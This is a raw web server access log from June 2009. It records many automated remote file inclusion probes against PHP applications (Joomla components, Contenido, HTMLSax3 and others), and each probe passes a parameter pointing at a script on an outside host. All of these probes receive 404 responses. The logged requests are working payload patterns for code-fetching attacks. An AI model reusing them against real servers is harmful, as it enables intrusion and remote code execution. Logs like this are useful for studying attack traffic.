67.19.107.26 - - [03/Jun/2009:20:47:26 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:20:47:50 -0500] "GET /logs/i.social.php?Q=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:20:47:50 -0500] "GET /i.social.php?Q=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:20:47:50 -0500] "GET /logs/access_log.1235347200/i.social.php?Q=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.140.23.192 - - [03/Jun/2009:20:48:34 -0500] "GET /logs/access_log.1226620800/i.social.php?Q=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:49:31 -0500] "GET /i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:49:31 -0500] "GET /logs/access_log.1235347200/i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:49:31 -0500] "GET /logs/i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:49:44 -0500] "GET /i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:49:44 -0500] "GET /logs/i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:49:44 -0500] "GET /logs/access_log.1235347200/i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:49:51 -0500] "GET /e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:49:51 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:49:51 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:49:51 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:50:16 -0500] "GET /logs/access_log.1226620800/i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.17.162.28 - - [03/Jun/2009:20:50:41 -0500] "GET /logs/access_log.1226620800/i.social.php?Q=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:20:51:05 -0500] "GET /e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:20:51:05 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:20:51:05 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:20:51:06 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:52:30 -0500] "GET //Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:52:30 -0500] "GET /logs/access_log.1236038400//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:52:30 -0500] "GET /logs//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:20:53:44 -0500] "GET //Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:20:53:44 -0500] "GET /logs//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:20:53:44 -0500] "GET /logs/access_log.1236038400//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:53:54 -0500] "GET /logs/access_log.1240963200//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:54:02 -0500] "GET //Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:54:02 -0500] "GET /logs//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:20:54:17 -0500] "GET /logs/access_log.1240963200//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:54:18 -0500] "GET /logs/access_log.1236038400//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:20:55:09 -0500] "GET /logs/access_log.1240963200//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:20:55:34 -0500] "GET /show.php?path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 291 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.52.2.130 - - [03/Jun/2009:20:55:34 -0500] "GET /logs/access_log.1239494400/show.php?path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 318 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.52.2.130 - - [03/Jun/2009:20:55:34 -0500] "GET /logs/show.php?path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 296 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.52.2.130 - - [03/Jun/2009:20:55:41 -0500] "GET /logs/access_log.1238112000/show.php?path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 318 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [03/Jun/2009:20:55:42 -0500] "GET /logs//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:20:55:42 -0500] "GET /logs/access_log.1236038400//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:20:55:42 -0500] "GET //Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:20:56:34 -0500] "GET /logs/access_log.1240963200//Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:58:25 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:58:25 -0500] "GET /logs/access_log.1238716800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:58:25 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:20:58:30 -0500] "GET /logs/access_log.1240012800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.55.106.196 - - [03/Jun/2009:20:58:40 -0500] "GET /logs/access_log.1158019200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.158.163.67 - - [03/Jun/2009:21:00:12 -0500] "GET /logs/access_log.1240012800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:21:00:12 -0500] "GET /logs/access_log.1238716800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:21:00:12 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.158.163.67 - - [03/Jun/2009:21:00:12 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.55.106.123 - - [03/Jun/2009:21:00:43 -0500] "GET /logs/access_log.1130457600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.10.128.219 - - [03/Jun/2009:21:02:23 -0500] "GET /pop3.php?CONFIG[pear_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
85.10.128.219 - - [03/Jun/2009:21:02:23 -0500] "GET /logs/pop3.php?CONFIG[pear_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
85.10.128.219 - - [03/Jun/2009:21:02:23 -0500] "GET /logs/access_log.1240531200/pop3.php?CONFIG[pear_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:21:02:30 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:21:02:30 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:21:02:30 -0500] "GET /logs/access_log.1238716800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:21:02:31 -0500] "GET /logs/access_log.1240012800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
190.144.44.36 - - [03/Jun/2009:21:02:45 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:21:02:45 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
85.10.128.219 - - [03/Jun/2009:21:03:56 -0500] "GET /logs/access_log.1240790400/pop3.php?CONFIG[pear_dir]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.106.108 - - [03/Jun/2009:21:04:12 -0500] "GET /logs/access_log.1205193600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.181.7.97 - - [03/Jun/2009:21:07:17 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
217.147.29.190 - - [03/Jun/2009:21:07:41 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:21:07:44 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:21:07:44 -0500] "GET /logs/access_log.1238716800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.147.29.190 - - [03/Jun/2009:21:07:45 -0500] "GET /logs/access_log.1240012800//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:12:51 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:12:51 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:12:51 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:12:51 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:14:02 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:14:02 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:14:02 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:21:14:02 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
190.144.44.36 - - [03/Jun/2009:21:26:26 -0500] "GET //include/lib.inc.php?site_path=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:21:26:26 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
65.55.106.139 - - [03/Jun/2009:21:26:50 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.144.44.36 - - [03/Jun/2009:21:27:27 -0500] "GET //include/write.php?dir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:21:27:27 -0500] "GET /logs//include/write.php?dir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
65.55.106.139 - - [03/Jun/2009:21:27:36 -0500] "GET /logs/access_log.1199404800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.144.44.36 - - [03/Jun/2009:21:28:09 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:21:28:09 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
211.49.99.7 - - [03/Jun/2009:21:30:52 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bangkokchurch.com/cache/office1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.49.99.7 - - [03/Jun/2009:21:30:53 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bangkokchurch.com/cache/office1.jpg??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.49.99.7 - - [03/Jun/2009:21:30:56 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bangkokchurch.com/cache/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.49.99.7 - - [03/Jun/2009:21:31:14 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bangkokchurch.com/cache/office1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:21:34:54 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:21:34:54 -0500] "GET /logs/access_log.1238112000/admin/config_settings.tpl.php?include_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.215.2.58 - - [03/Jun/2009:21:34:54 -0500] "GET /admin/config_settings.tpl.php?include_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:21:36:27 -0500] "GET /admin/config_settings.tpl.php?include_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:21:36:27 -0500] "GET /logs/access_log.1238112000/admin/config_settings.tpl.php?include_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.19.107.26 - - [03/Jun/2009:21:36:27 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.55.106.217 - - [03/Jun/2009:21:39:36 -0500] "GET /logs/access_log.1119139200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.153.212.195 - - [03/Jun/2009:21:40:38 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:21:40:41 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:21:40:42 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:21:40:47 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:02 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:02 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:02 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:06 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:06 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:06 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:10 -0500] "GET /logs/access_log.1241740800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:41:22 -0500] "GET /logs/access_log.1241740800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:02 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:02 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:02 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:07 -0500] "GET /logs/access_log.1241740800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:08 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:08 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:08 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [03/Jun/2009:21:42:14 -0500] "GET /logs/access_log.1241740800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:21:42:18 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:21:42:18 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:21:42:18 -0500] "GET /logs/access_log.1240358400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:21:42:18 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:21:47:30 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:21:47:30 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:21:47:30 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:21:48:49 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:21:58:03 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:21:58:03 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:21:58:03 -0500] "GET /logs/access_log.1237507200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:21:58:17 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
